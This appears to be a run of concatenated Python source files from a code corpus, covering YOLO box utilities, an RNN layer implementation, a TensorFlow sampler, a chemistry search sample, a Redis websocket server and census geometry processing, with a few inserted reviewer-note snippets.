cv2.imread(img)\n dim = orig_im.shape[1], orig_im.shape[0]\n\n img = letterbox_image(orig_im, (inp_dim, inp_dim))\n img_ = img[:,:,::-1].transpose((2,0,1)).copy()\n img_ = torch.from_numpy(img_).float().div(255.0).unsqueeze(0)\n return img_, orig_im, dim\n\ndef prep_image_noletter(img,input_dim):\n orig_im = cv2.imread(img)\n img_w, img_h = orig_im.shape[1], orig_im.shape[0]\n\n resized_image = cv2.resize(orig_im, (input_dim,input_dim), interpolation=cv2.INTER_CUBIC)\n img_ = resized_image[:,:,::-1].transpose((2,0,1)).copy()\n img_ = torch.from_numpy(img_).float().div(255.0).unsqueeze(0)\n return img_, orig_im, (img_w,img_h)\n\n \n \n \n\ndef bbox_iou(box1,box2):\n\n \"\"\"\n Returns the IoU of two bounding boxes \n 向量形式计算 第一个Box 与后面所有的box 计算iou\n \"\"\" \n b1_x1,b1_y1,b1_x2,b1_y2 = box1[:,0],box1[:,1],box1[:,2],box1[:,3]\n b2_x1,b2_y1,b2_x2,b2_y2 = box2[:,0],box2[:,1],box2[:,2],box2[:,3]\n\n #获得相交领域的矩形\n inter_rect_x1 = torch.max(b1_x1,b2_x1)\n inter_rect_y1 = torch.max(b1_y1,b2_y1)\n inter_rect_x2 = torch.min(b1_x2,b2_x2)\n inter_rect_y2 = torch.min(b1_y2,b2_y2)\n \n\n #计算面积\n\n # Intersection area\n if torch.cuda.is_available():\n inter_area = torch.max(inter_rect_x2 - inter_rect_x1 + 1, torch.zeros(inter_rect_x2.shape).cuda()) * torch.max(\n inter_rect_y2 - inter_rect_y1 + 1, 
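# Reviewer note: with the intercept column prepended, the whole gradient in
# gradient.py above collapses to one matrix product. Note the module's
# forumla() (sic) actually returns theta[j] minus that term, i.e. an update
# step with learning rate 1, not the bare partial derivative.
import numpy as np
x = np.array([1.0, 2.0, 3.0])
y = np.array([2.0, 4.0, 6.0])
theta = np.array([0.0, 1.0])
X = np.c_[np.ones_like(x), x]
grad = X.T @ (X @ theta - y) / len(y)
print(grad)  # [-2.0, -4.666...]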
torch.zeros(inter_rect_x2.shape).cuda())\n else:\n inter_area = torch.max(inter_rect_x2 - inter_rect_x1 + 1, torch.zeros(inter_rect_x2.shape)) * torch.max(\n inter_rect_y2 - inter_rect_y1 + 1, torch.zeros(inter_rect_x2.shape))\n\n # Intersection area\n # inter_area = torch.clamp(inner_rect_x2 - inner_rect_x1 + 1, min=0) * torch.clamp(inner_rect_y2 - inner_rect_y1 + 1,min=0)\n b1_area = (b1_x2 - b1_x1 + 1)*(b1_y2 - b1_y1 + 1)\n b2_area = (b2_x2 - b2_x1 + 1)*(b2_y2 - b2_y1 + 1)\n\n iou = inter_area / (b1_area + b2_area - inter_area)\n \n return iou\n\n\n\n'''\nyolo 源码中的nms\nint nms_comparator(const void *pa, const void *pb)\n{\n detection a = *(detection *)pa;\n detection b = *(detection *)pb;\n float diff = 0;\n if(b.sort_class >= 0){\n diff = a.prob[b.sort_class] - b.prob[b.sort_class];\n } else {\n diff = a.objectness - b.objectness;\n }\n //diff < 0 则a < b \n if(diff < 0) return 1;\n else if(diff > 0) return -1;\n return 0;\n}\nqsort如果其第一个参数比第二个参数小,则返回一个小于0的值,反之则返回一个大于0的值,如果相等,则返 回0。\nvoid do_nms_sort(detection *dets, int total, int classes, float thresh)\n{\n int i, j, k;\n k = total-1;\n for(i = 0; i <= k; ++i){\n if(dets[i].objectness == 0){\n detection swap = dets[i];\n dets[i] = dets[k];\n dets[k] = swap;\n --k;\n --i;\n }\n }\n total = k+1;\n\n for(k = 0; k < classes; ++k){\n for(i = 0; i < total; ++i){\n dets[i].sort_class = k;\n }\n qsort(dets, total, sizeof(detection), nms_comparator);\n for(i = 0; i < total; ++i){\n if(dets[i].prob[k] == 0) continue;\n box a = dets[i].bbox;\n for(j = i+1; j < total; ++j){\n box b = dets[j].bbox;\n if (box_iou(a, b) > thresh){\n dets[j].prob[k] = 0;\n }\n }\n }\n }\n}\n'''\n\ndef detect_box_nms_sort(detectBoxs,thresh,num_class):\n num_boxes = len(detectBoxs)\n\n for class_index in range(num_class):\n for i in range(num_boxes):\n detectBoxs[i].sort_class = class_index\n #从大到小排列\n detectBoxs = sorted(detectBoxs,reverse=True)\n for i in range(num_boxes):\n if (detectBoxs[i].prob_list[class_index]==0):\n continue\n box_a = detectBoxs[i].box\n for j in range(i+1,num_boxes):\n if detectBoxs[j].objectness == 0:\n continue\n box_b = detectBoxs[j].box\n boxs_iou = bbox_iou_boxclass(box_a,box_b)\n if boxs_iou > thresh:\n detectBoxs[j].objectness = 0\n for k in range(num_class):\n detectBoxs[j].prob_list[k] = 0\n new_detectBoxes = []\n for detectbox in detectBoxs:\n if detectbox.objectness > thresh:\n new_detectBoxes.append(detectbox)\n return new_detectBoxes\n\ndef correct_yolo_boxes(detectBoxes,img_width,img_height,net_width,net_height):\n img_height = float(img_height)\n img_width = float(img_width)\n net_height = float(net_height)\n net_width = float(net_width)\n\n if net_width / img_width < net_height /img_height:\n new_width = net_width\n new_height = (img_height * net_width) / img_width\n else:\n new_width = (img_width * net_height) / img_height\n new_height = net_height\n x_old,x_slide = (new_width - new_width)/(2 * net_width),net_width/new_width\n y_old,y_slide = (net_height - new_height)/(2 * net_height),net_height/new_height\n for i in range(len(detectBoxes)):\n if detectBoxes[i].objectness==0:\n continue\n detectBoxes[i].box.x = (detectBoxes[i].box.x-x_old) * x_slide\n detectBoxes[i].box.y = (detectBoxes[i].box.y-y_old) * y_slide\n detectBoxes[i].box.w *= x_slide\n detectBoxes[i].box.h *= y_slide\n return detectBoxes\n\n\ndef draw_box_cv2(detectBoxes,oriImg,class_name_list):\n assert type(detectBoxes[0])==DetectionBox\n classes = len(class_name_list)\n\n img_width = oriImg.shape[1]\n img_height = oriImg.shape[0]\n\n for detectBox in 
detectBoxes:\n class_index = detectBox.find_class_index()\n if class_index == -1:\n continue\n box = detectBox.box\n classname = class_name_list[class_index]\n left = int((box.x- box.w/2.0) * img_width)\n top = int((box.y-box.h/2.0) * img_height)\n right = int((box.x + box.w/2.0) * img_width)\n bottom = int((box.y + box.h/2.0) * img_height)\n offset = class_index * 123457 % classes\n\n red = get_color(2, offset, classes)\n green = get_color(1, offset, classes)\n blue = get_color(0, offset, classes)\n\n cv2.rectangle(oriImg, (left,top),(right,bottom),(red,blue,green), 3)\n t_size = cv2.getTextSize(classname, cv2.FONT_HERSHEY_PLAIN, 1, 1)[0]\n cv2.putText(oriImg, classname, (left, top - t_size[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (red,blue,green), 1, cv2.LINE_AA)\n return oriImg\n\ndef get_color(c, x, max_val):\n colors = [[1, 0, 1], [0, 0, 1], [0, 1, 1], [0, 1, 0], [1, 1, 0], [1, 0, 0]]\n ratio = float(x)/max_val * 5\n i = int(math.floor(ratio))\n j = int(math.ceil(ratio))\n ratio = ratio - i\n r = (1-ratio) * colors[i][c] + ratio*colors[j][c]\n return int(r*255)\n\ndef load_one_image_cv2(imagefile,resize_dim):\n image_tensor,orig_ims,dim = prep_image(imagefile,resize_dim)\n return image_tensor,orig_ims,dim\n\ndef unique(tensor):\n #取label tensor 中的唯一值 ,用Numpy中的unique()api\n tensorNp = tensor.cpu().numpy()\n uniqueNp = np.unique(tensorNp)\n \n uniqueTensor = torch.from_numpy(uniqueNp)\n tensor_res = tensor.new(uniqueTensor.shape)\n tensor_res.copy_(uniqueTensor)\n return tensor_res\n \n \n \n \n \n\n ","sub_path":"lib/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"609791098","text":"\"\"\" Contains tensorflow-sampler class. 
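# Reviewer note: a scalar version of bbox_iou from util.py above, for two
# boxes in (x1, y1, x2, y2) corner format, keeping the same +1 pixel
# convention:
def iou(a, b):
    ix1, iy1 = max(a[0], b[0]), max(a[1], b[1])
    ix2, iy2 = min(a[2], b[2]), min(a[3], b[3])
    inter = max(ix2 - ix1 + 1, 0) * max(iy2 - iy1 + 1, 0)
    area_a = (a[2] - a[0] + 1) * (a[3] - a[1] + 1)
    area_b = (b[2] - b[0] + 1) * (b[3] - b[1] + 1)
    return inter / (area_a + area_b - inter)

print(iou((0, 0, 9, 9), (5, 5, 14, 14)))  # 25 / 175 = 0.142...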
\"\"\"\n\nfrom copy import copy\nimport tensorflow as tf\nfrom ...sampler import Sampler, _get_method_by_alias\n\n\n\nclass TfSampler(Sampler):\n \"\"\" Sampler based on a distribution from tf.distributions.\n\n Parameters\n ----------\n name : str\n name of a distribution (class from tf.distributions), or its alias.\n **kwargs\n additional keyword-args for distribution specification.\n E.g., `loc` for name='Normal'\n\n Attributes\n ----------\n name : str\n name of a distribution (class from tf.distributions).\n _params : dict\n dict of args for distribution specification.\n graph : tf.Graph\n graph in which sampling nodes are placed.\n sampler : tf.distributions\n instance of distributions' class.\n sess : tf.Session\n session used for running sample-tensor.\n \"\"\"\n def __init__(self, name, **kwargs):\n super().__init__(name, **kwargs)\n name = _get_method_by_alias(name, 'tf', tf.distributions)\n self.name = name\n self._params = copy(kwargs)\n self.graph = tf.Graph()\n with self.graph.as_default():\n config = tf.ConfigProto(device_count={'GPU':0})\n self.sess = tf.Session(config=config)\n _ = kwargs.pop('dim', None)\n self.sampler = getattr(tf.distributions, self.name)(**kwargs)\n\n def sample(self, size): # pylint: disable=method-hidden\n \"\"\" Sampling method of ``TfSampler``.\n\n Generates random samples from distribution ``self.name``.\n\n Parameters\n ----------\n size : int\n the size of sample to be generated.\n\n Returns\n -------\n np.ndarray\n array of shape (size, Sampler's dimension).\n \"\"\"\n with self.graph.as_default():\n _sample = self.sampler.sample(size)\n\n sample = self.sess.run(_sample)\n\n if len(sample.shape) == 1: # pylint: disable=no-member\n sample = sample.reshape(-1, 1) # pylint: disable=no-member\n return sample\n","sub_path":"batchflow/models/tf/tf_sampler.py","file_name":"tf_sampler.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"44910879","text":"#!/usr/bin/env python\n# (C) 2017 OpenEye Scientific Software Inc. All rights reserved.\n#\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. 
In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\n# @ \nfrom __future__ import print_function\n\nfrom openeye import oechem\n\nqfile = oechem.oemolistream(\"query.mol\")\ntfile = oechem.oemolistream(\"targets.sdf\")\n\n# set the same aromaticity model for the query and the target file\n# @ \naromodel = oechem.OEIFlavor_Generic_OEAroModelMDL\nqflavor = qfile.GetFlavor(qfile.GetFormat())\nqfile.SetFlavor(qfile.GetFormat(), (qflavor | aromodel))\ntflavor = tfile.GetFlavor(tfile.GetFormat())\ntfile.SetFlavor(tfile.GetFormat(), (tflavor | aromodel))\n# @ \n\n# read MDL query and initialize the substructure search\nopts = oechem.OEMDLQueryOpts_Default | oechem.OEMDLQueryOpts_SuppressExplicitH\nqmol = oechem.OEQMol()\n\n# @ \noechem.OEReadMDLQueryFile(qfile, qmol, opts)\nss = oechem.OESubSearch(qmol)\n# @ \n\n# loop over target structures\ntindex = 1\nfor tmol in tfile.GetOEGraphMols():\n oechem.OEPrepareSearch(tmol, ss)\n if ss.SingleMatch(tmol):\n print(\"hit target =\", tindex)\n tindex += 1\n# @ \n","sub_path":"venv/Lib/site-packages/openeye/docexamples/oechem/MDLQuerySearchSingleMatch.py","file_name":"MDLQuerySearchSingleMatch.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"572461018","text":"import numpy as np\nfrom layers import Layer\nfrom utils.tools import *\nimport copy\n\n\"\"\"\nThis file defines layer types that are commonly used for recurrent neural networks.\n\"\"\"\n\nclass RNNCell(Layer):\n def __init__(self, in_features, units, name='rnn_cell', initializer=Guassian()):\n \"\"\"\n # Arguments\n in_features: int, the number of inputs features\n units: int, the number of hidden units\n initializer: Initializer class, to initialize weights\n \"\"\"\n super(RNNCell, self).__init__(name=name)\n self.trainable = True\n\n self.kernel = initializer.initialize((in_features, units))\n self.recurrent_kernel = initializer.initialize((units, units))\n self.bias = np.zeros(units)\n\n self.kernel_grad = np.zeros(self.kernel.shape)\n self.r_kernel_grad = np.zeros(self.recurrent_kernel.shape)\n self.b_grad = np.zeros(self.bias.shape)\n\n def forward(self, inputs):\n \"\"\"\n # Arguments\n inputs: [input numpy array with shape (batch, in_features), \n state numpy array with shape (batch, units)]\n\n # Returns\n outputs: numpy array with shape (batch, units)\n \"\"\"\n batch = len(inputs[0])\n inputs[0] @ self.kernel\n inputs[1] @ self.recurrent_kernel\n a_t = inputs[0] @ self.kernel + inputs[1] @ self.recurrent_kernel + np.repeat(self.bias.reshape((1, -1)), batch, axis=0)\n return np.tanh(a_t)\n\n def backward(self, in_grads, inputs):\n \"\"\"\n # Arguments\n in_grads: numpy array with shape (batch, units), gradients to outputs\n inputs: [input numpy array with shape (batch, in_features), \n state numpy array with shape (batch, units)], same with forward inputs\n\n # Returns\n out_grads: [gradients to input numpy array with shape (batch, in_features), \n gradients to state numpy array with shape (batch, units)]\n \"\"\"\n h_t = self.forward(inputs)\n d_a_t = (1 - np.square(h_t)) * in_grads\n d_a_t = np.nan_to_num(d_a_t)\n self.b_grad = np.sum(d_a_t, axis=0)\n self.kernel_grad = np.nan_to_num(inputs[0].T) @ d_a_t\n self.r_kernel_grad = np.nan_to_num(inputs[1].T) @ d_a_t\n out_grads_in = d_a_t @ self.kernel.T\n out_grads_h = d_a_t @ self.recurrent_kernel.T\n\n return [out_grads_in, out_grads_h]\n\n def update(self, params):\n 
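# Reviewer note: an open-source analogue of the search loop above using
# RDKit instead of the proprietary OpenEye toolkit (a substitution, not
# the sample's own API): compile the query once, then test each target
# for a single match.
from rdkit import Chem
query = Chem.MolFromSmarts("c1ccccc1")                      # aromatic ring
targets = [Chem.MolFromSmiles(s) for s in ("c1ccccc1O", "CCO")]
for tindex, mol in enumerate(targets, start=1):
    if mol.HasSubstructMatch(query):
        print("hit target =", tindex)                       # phenol only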
\"\"\"Update parameters with new params\n \"\"\"\n for k,v in params.items():\n if '/kernel' in k:\n self.kernel = v\n elif '/recurrent_kernel' in k:\n self.recurrent_kernel = v\n elif '/bias' in k:\n self.bias = v\n \n def get_params(self, prefix):\n \"\"\"Return parameters and gradients\n \n # Arguments\n prefix: string, to contruct prefix of keys in the dictionary (usually is the layer-ith)\n\n # Returns\n params: dictionary, store parameters of this layer\n grads: dictionary, store gradients of this layer\n\n None: if not trainable\n \"\"\"\n if self.trainable:\n params = {\n prefix+':'+self.name+'/kernel': self.kernel,\n prefix+':'+self.name+'/recurrent_kernel': self.recurrent_kernel,\n prefix+':'+self.name+'/bias': self.bias\n }\n grads = {\n prefix+':'+self.name+'/kernel': self.kernel_grad,\n prefix+':'+self.name+'/recurrent_kernel': self.r_kernel_grad,\n prefix+':'+self.name+'/bias': self.b_grad\n }\n return params, grads\n else:\n return None\n\n\nclass RNN(Layer):\n def __init__(self, cell, h0=None, name='rnn'):\n \"\"\"\n # Arguments\n cell: instance of RNN Cell\n h0: default initial state, numpy array with shape (units,)\n \"\"\"\n super(RNN, self).__init__(name=name)\n self.trainable = True\n self.cell = cell\n if h0 is None:\n self.h0 = np.zeros_like(self.cell.bias)\n else:\n self.h0 = h0\n \n self.kernel = self.cell.kernel\n self.recurrent_kernel = self.cell.recurrent_kernel\n self.bias = self.cell.bias\n\n self.kernel_grad = np.zeros(self.kernel.shape)\n self.r_kernel_grad = np.zeros(self.recurrent_kernel.shape)\n self.b_grad = np.zeros(self.bias.shape)\n\n def forward(self, inputs):\n \"\"\"\n # Arguments\n inputs: input numpy array with shape (batch, time_steps, in_features), \n\n # Returns\n outputs: numpy array with shape (batch, time_steps, units)\n \"\"\"\n batch = inputs.shape[0]\n h_0 = self.h0\n if self.h0.size == self.cell.bias.size:\n h_0 = np.tile(self.h0, batch).reshape((batch, -1))\n\n inputs = inputs.transpose((1, 0, 2))\n outputs = np.empty((inputs.shape[0], inputs.shape[1], len(self.cell.bias)))\n \n h_t = h_0\n for t in range(0, len(inputs)):\n h_t = self.cell.forward([inputs[t], h_t])\n outputs[t] = h_t\n\n return outputs.transpose((1, 0, 2))\n\n def backward(self, in_grads, inputs):\n \"\"\"\n # Arguments\n in_grads: numpy array with shape (batch, time_steps, units), gradients to outputs\n inputs: numpy array with shape (batch, time_steps, in_features), same with forward inputs\n\n # Returns\n out_grads: numpy array with shape (batch, time_steps, in_features), gradients to inputs\n \"\"\"\n batch = inputs.shape[0]\n h_0 = self.h0\n if self.h0.size == self.cell.bias.size:\n h_0 = np.tile(self.h0, batch).reshape((batch, -1))\n\n outputs = self.forward(inputs)\n\n inputs = inputs.transpose((1, 0, 2))\n outputs = outputs.transpose((1, 0, 2))\n\n in_grads = in_grads.transpose((1, 0, 2))\n out_grads = np.empty(inputs.shape)\n\n self.kernel_grad = np.zeros(self.kernel.shape)\n self.r_kernel_grad = np.zeros(self.recurrent_kernel.shape)\n self.b_grad = np.zeros(self.bias.shape)\n \n out_grads_s = np.zeros(in_grads.shape[1:3])\n for t in range(len(inputs)-1, -1, -1):\n out_grads_t = self.cell.backward(in_grads[t]+out_grads_s, [inputs[t], outputs[t-1] if t > 0 else h_0])\n self.kernel_grad += self.cell.kernel_grad\n self.r_kernel_grad += self.cell.r_kernel_grad\n self.b_grad += self.cell.b_grad\n (out_grads[t], out_grads_s) = out_grads_t\n\n return out_grads.transpose((1, 0, 2))\n\n def update(self, params):\n \"\"\"Update parameters with new params\n \"\"\"\n for 
k,v in params.items():\n if '/kernel' in k:\n self.kernel = v\n elif '/recurrent_kernel' in k:\n self.recurrent_kernel = v\n elif '/bias' in k:\n self.bias = v\n \n def get_params(self, prefix):\n \"\"\"Return parameters and gradients\n \n # Arguments\n prefix: string, to contruct prefix of keys in the dictionary (usually is the layer-ith)\n\n # Returns\n params: dictionary, store parameters of this layer\n grads: dictionary, store gradients of this layer\n\n None: if not trainable\n \"\"\"\n if self.trainable:\n params = {\n prefix+':'+self.name+'/kernel': self.kernel,\n prefix+':'+self.name+'/recurrent_kernel': self.recurrent_kernel,\n prefix+':'+self.name+'/bias': self.bias\n }\n grads = {\n prefix+':'+self.name+'/kernel': self.kernel_grad,\n prefix+':'+self.name+'/recurrent_kernel': self.r_kernel_grad,\n prefix+':'+self.name+'/bias': self.b_grad\n }\n return params, grads\n else:\n return None \n\n\nclass BidirectionalRNN(Layer):\n \"\"\" Bi-directional RNN in Concatenating Mode\n \"\"\"\n def __init__(self, cell, h0=None, hr=None, name='brnn'):\n \"\"\"Initialize two inner RNNs for forward and backward processes, respectively\n\n # Arguments\n cell: instance of RNN Cell(D, H) for initializing the two RNNs\n h0: default initial state for forward phase, numpy array with shape (units,)\n hr: default initial state for backward phase, numpy array with shape (units,)\n \"\"\"\n super(BidirectionalRNN, self).__init__(name=name)\n self.trainable = True\n self.forward_rnn = RNN(cell, h0, 'forward_rnn')\n self.backward_rnn = RNN(copy.deepcopy(cell), hr, 'backward_rnn')\n\n def _reverse_temporal_data(self, x, mask):\n \"\"\" Reverse a batch of sequence data\n\n # Arguments\n x: a numpy array of shape (batch, time_steps, units), e.g.\n [[x_0_0, x_0_1, ..., x_0_k1, Unknown],\n ...\n [x_n_0, x_n_1, ..., x_n_k2, Unknown, Unknown]] (x_i_j is a vector of dimension of D)\n mask: a numpy array of shape (batch, time_steps), indicating the valid values, e.g.\n [[1, 1, ..., 1, 0],\n ...\n [1, 1, ..., 1, 0, 0]]\n\n # Returns\n reversed_x: numpy array with shape (batch, time_steps, units)\n \"\"\"\n num_nan = np.sum(~mask, axis=1)\n reversed_x = np.array(x[:, ::-1, :])\n for i in range(num_nan.size):\n reversed_x[i] = np.roll(reversed_x[i], x.shape[1]-num_nan[i], axis=0)\n return reversed_x\n\n def forward(self, inputs):\n \"\"\"\n Forward pass for concatenating hidden vectors obtained from the RNN \n processing on normal sentences and the RNN processing on reversed sentences.\n Outputs concatenate the two produced sequences.\n\n # Arguments\n inputs: input numpy array with shape (batch, time_steps, in_features), \n\n # Returns\n outputs: numpy array with shape (batch, time_steps, units*2)\n \"\"\"\n mask = ~np.any(np.isnan(inputs), axis=2)\n forward_outputs = self.forward_rnn.forward(inputs)\n backward_outputs = self.backward_rnn.forward(self._reverse_temporal_data(inputs, mask))\n outputs = np.concatenate([forward_outputs, self._reverse_temporal_data(backward_outputs, mask)], axis=2)\n return outputs\n\n def backward(self, in_grads, inputs):\n \"\"\"\n # Arguments\n in_grads: numpy array with shape (batch, time_steps, units*2), gradients to outputs\n inputs: numpy array with shape (batch, time_steps, in_features), same with forward inputs\n\n # Returns\n out_grads: numpy array with shape (batch, time_steps, in_features), gradients to inputs\n \"\"\"\n mask = ~np.any(np.isnan(inputs), axis=2)\n in_grads_split = np.split(in_grads, 2, axis=2)\n forward_in_grads = in_grads_split[0]\n backward_in_grads = 
self._reverse_temporal_data(in_grads_split[1], mask)\n forward_out_grads = self.forward_rnn.backward(forward_in_grads, inputs)\n backward_out_grads = self.backward_rnn.backward(backward_in_grads, self._reverse_temporal_data(inputs, mask))\n return forward_out_grads + self._reverse_temporal_data(backward_out_grads, mask)\n\n def update(self, params):\n \"\"\"Update parameters with new params\n \"\"\"\n for k,v in params.items():\n if '/forward_kernel' in k:\n self.forward_rnn.kernel = v\n elif '/forward_recurrent_kernel' in k:\n self.forward_rnn.recurrent_kernel = v\n elif '/forward_bias' in k:\n self.forward_rnn.bias = v\n elif '/backward_kernel' in k:\n self.backward_rnn.kernel = v\n elif '/backward_recurrent_kernel' in k:\n self.backward_rnn.recurrent_kernel = v\n elif '/backward_bias' in k:\n self.backward_rnn.bias = v\n \n def get_params(self, prefix):\n \"\"\"Return parameters and gradients\n \n # Arguments\n prefix: string, to contruct prefix of keys in the dictionary (usually is the layer-ith)\n\n # Returns\n params: dictionary, store parameters of this layer\n grads: dictionary, store gradients of this layer\n\n None: if not trainable\n \"\"\"\n if self.trainable:\n params = {\n prefix+':'+self.name+'/forward_kernel': self.forward_rnn.kernel,\n prefix+':'+self.name+'/forward_recurrent_kernel': self.forward_rnn.recurrent_kernel,\n prefix+':'+self.name+'/forward_bias': self.forward_rnn.bias,\n prefix+':'+self.name+'/backward_kernel': self.backward_rnn.kernel,\n prefix+':'+self.name+'/backward_recurrent_kernel': self.backward_rnn.recurrent_kernel,\n prefix+':'+self.name+'/backward_bias': self.backward_rnn.bias\n }\n grads = {\n prefix+':'+self.name+'/forward_kernel': self.forward_rnn.kernel_grad,\n prefix+':'+self.name+'/forward_recurrent_kernel': self.forward_rnn.r_kernel_grad,\n prefix+':'+self.name+'/forward_bias': self.forward_rnn.b_grad,\n prefix+':'+self.name+'/backward_kernel': self.backward_rnn.kernel_grad,\n prefix+':'+self.name+'/backward_recurrent_kernel': self.backward_rnn.r_kernel_grad,\n prefix+':'+self.name+'/backward_bias': self.backward_rnn.b_grad\n }\n return params, grads\n else:\n return None","sub_path":"rnn/rnn_layers.py","file_name":"rnn_layers.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"398314868","text":"__author__ = 'michael'\nfrom bottle import request, Bottle, abort\nimport redis\napp = Bottle()\n\nworker_thread = None\nweb_socket = None\nalready_subscribed = False\n\ndef handler(message):\n web_socket.send(message['data'])\n\ndef listener(channel_uniq, ws):\n\tr = redis.StrictRedis(host=\"localhost\", port=6379, db=0)\n\tchannel_listener = r.pubsub()\n\tchannel_name = 'monitor'\n\tglobal web_socket\n\tweb_socket = ws\n\tglobal worker_thread\n\tif not worker_thread and channel_uniq:\n\t\tchannel_listener.subscribe( **{channel_name: handler})\n\t\tthread = channel_listener.run_in_thread(sleep_time=0.001)\n\n\t\tworker_thread= thread\n\n@app.route('/conversation')\ndef handle_websocket():\n\twsock = request.environ.get('wsgi.websocket')\n\tif not wsock:\n\t\tabort(400, 'Expected WebSocket request.')\n\twhile True:\n\t\ttry:\n\t\t\tmessage = wsock.receive()\n\n\t\t\tlistener(message, wsock)\n\t\texcept WebSocketError:\n\t\t\tglobal worker_thread\n\t\t\tif worker_thread:\n\t\t\t\tworker_thread.stop()\n\t\t\tworker_thread = None\n\t\t\tbreak\n\nfrom gevent.pywsgi import WSGIServer\nfrom geventwebsocket import WebSocketError\nfrom geventwebsocket.handler 
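# Reviewer note: a numpy spot-check of RNNCell.forward from rnn_layers.py
# above, h_t = tanh(x @ W + h_prev @ U + b), shapes only:
import numpy as np
rng = np.random.default_rng(0)
batch, in_features, units = 4, 3, 5
x = rng.normal(size=(batch, in_features))
h_prev = np.zeros((batch, units))
W = rng.normal(size=(in_features, units))
U = rng.normal(size=(units, units))
b = np.zeros(units)
h_t = np.tanh(x @ W + h_prev @ U + b)
print(h_t.shape)  # (4, 5)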
import WebSocketHandler\n\nserver = WSGIServer((\"0.0.0.0\", 8090), app,handler_class=WebSocketHandler)\nserver.serve_forever()\n\n\n\n","sub_path":"noe/websocketserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"116215423","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nTable = [255,0,0]\n#Background = [255,255,255]\nUnlabelled = [0,0,0]\n\nDSET_MEAN = [0.41189489566336, 0.4251328133025, 0.4326707089857]\nDSET_STD = [0.27413549931506, 0.28506257482912, 0.28284674400252]\n\nlabel_colours = np.array([Table, Unlabelled])\n\n\ndef view_annotated(filename,tensor, plot=True):\n temp = tensor.numpy()\n r = temp.copy()\n g = temp.copy()\n b = temp.copy()\n for l in range(0,2):\n r[temp==l]=label_colours[l,0]\n g[temp==l]=label_colours[l,1]\n b[temp==l]=label_colours[l,2]\n\n rgb = np.zeros((temp.shape[0], temp.shape[1], 3))\n rgb[:,:,0] = (r/255.0)#[:,:,0]\n rgb[:,:,1] = (g/255.0)#[:,:,1]\n rgb[:,:,2] = (b/255.0)#[:,:,2]\n if plot:\n plt.imshow(rgb)\n plt.show()\n else:\n plt.imsave(os.path.join('results',filename),rgb)\n print('Saved: ',filename)\n #return rgb\n\ndef decode_image(tensor):\n inp = tensor.numpy().transpose((1, 2, 0))\n mean = np.array(DSET_MEAN)\n std = np.array(DSET_STD)\n inp = std * inp + mean\n return inp\n\ndef view_image(tensor):\n inp = decode_image(tensor)\n inp = np.clip(inp, 0, 1)\n plt.imshow(inp)\n plt.show()\n","sub_path":"utils/imgs.py","file_name":"imgs.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"372918496","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport pandas as pd\n\ncolumn_order = ['geoid', 'name', 'state_fips', 'county_fips', 'tract_code',\n 'block_group_code', 'land_area', 'water_area', 'wkt']\n\ncounty = pd.read_csv(sys.argv[1])\n\ncounty.columns = county.columns.str.lower()\ncounty = county.drop(['countyns', 'geoid', 'name', 'lsad', 'classfp', 'mtfcc', 'csafp', 'cbsafp',\n 'metdivfp', 'funcstat', 'intptlat', 'intptlon', 'shape_length', 'shape_area'], axis=1)\n\ncounty.columns = ['wkt', 'state_fips', 'county_fips', 'name', 'land_area', 'water_area', 'geoid']\n\ncounty['tract_code'] = ''\ncounty['block_group_code'] = ''\n\ncounty = county[column_order]\n\ncounty['state_fips'] = county['state_fips'].astype(str).replace(re.compile('\\.0$'), '')\ncounty['state_fips'] = county['state_fips'].replace('nan', '')\ncounty['state_fips'] = county['state_fips'].str.pad(2, 'left', '0')\n\ncounty['county_fips'] = county['county_fips'].astype(str).replace(re.compile('\\.0$'), '')\ncounty['county_fips'] = county['county_fips'].replace('nan', '')\ncounty['county_fips'] = county['county_fips'].str.pad(3, 'left', '0')\n\ncounty.to_csv(sys.argv[2], index=False)\n\n","sub_path":"acs/bin/process_county_geo.py","file_name":"process_county_geo.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"505675154","text":"import logging\nfrom typing import Optional, Tuple, Union\n\nfrom gi.repository import Gdk, Gtk\nfrom typing_extensions import Protocol\n\nfrom gaphas.aspect import HandleMove, Move, item_at_point\nfrom gaphas.canvas import ancestors\nfrom gaphas.connector import Handle\nfrom gaphas.geometry import distance_point_point_fast\nfrom gaphas.item import Item\nfrom gaphas.types import Pos\nfrom 
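# Reviewer note: the FIPS clean-up from process_county_geo.py above in
# three steps, on hypothetical values; note that a missing code still gets
# zero-padded (here to "00"), exactly as in the original:
import pandas as pd
s = pd.Series(["6.0", "48.0", "nan"])
s = s.str.replace(r"\.0$", "", regex=True).replace("nan", "")
s = s.str.pad(2, "left", "0")
print(s.tolist())  # ['06', '48', '00']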
